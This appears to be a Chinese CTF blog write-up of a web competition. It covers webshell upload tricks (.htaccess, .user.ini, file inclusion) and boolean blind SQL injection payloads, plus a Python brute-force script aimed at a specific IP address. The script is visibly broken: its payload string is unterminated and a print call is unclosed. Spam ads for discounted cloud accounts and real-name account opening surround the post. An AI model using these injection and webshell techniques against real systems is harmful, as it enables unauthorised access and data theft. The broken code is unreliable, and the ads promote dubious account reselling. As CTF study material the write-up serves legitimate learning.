【web-ctf】ctf月赛和升级赛

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

文章目录

2022/10/2 升级赛-web

学到的知识点

第一题文件上传漏洞+文件包含漏洞

  1. 传入一个无法解析的一句话木马后可以尝试

1上传.htaccess或.user.ini文件。
2还是无法解析的话可以查找每个页面的源代码看看有没有文件包含漏洞。
3还是无法解析的话可以尝试查找服务器用的php版本、中间件版本等看该版本下有没有漏洞。

  1. 上传文件后可以查看以下网页源代码有可能会返回文件上传后的位置
  2. 上传文件后可以尝试访问以下该文件看传入后的文件中的某些字符是否被过滤或修改如有修改则可以尝试传一些其他的一句话木马。

第二题布尔盲注

  1. locate函数可以用于布尔盲注局限性表中只能有一个表项否则就会返回错误。

payloadid=‘{}’/(select(locate(binary(‘{}’),结果所在列名,{}))from(结果所在表名))/‘1’

第一个和第三个位置填入盲注的字符的位置第二个位置填入盲注使用的字符的二进制编码因为在传入普通字符串的时候locate函数是大小写不敏感的所以需要使用binary函数转换为二进制字符串来处理

  1. strcmp函数可以用于布尔盲注
import requests as req
import pytricks
import string

chars = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz'
# chars = string.ascii_letters + string.digits + "_{}"
ans = 'flag{'
j = 0

for pos in range(1,80):
	for ch in chars:
		t = (ans + ch)
		t = t.ascii_format("char(%d)",",")
		t = f"concat({t})"
		payload=f"""'and(pow(999,bin(strcmp((select(flag)from(flag)),binary({t}))))
		res = req.post('http://124.16.75.162:31012/',params={"id":payload})
		if 'error 1690' in res.text:
			ans += chr(ord(ch)-1)
			break
		if 'hack' in res.text:
			print("hack")
			exit()
		if 'error ' in res.text:
			print(res.text)
			exit()
	print(ans
  1. 常见的flag所在表名和列名为flag即select flag from flag

题解

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6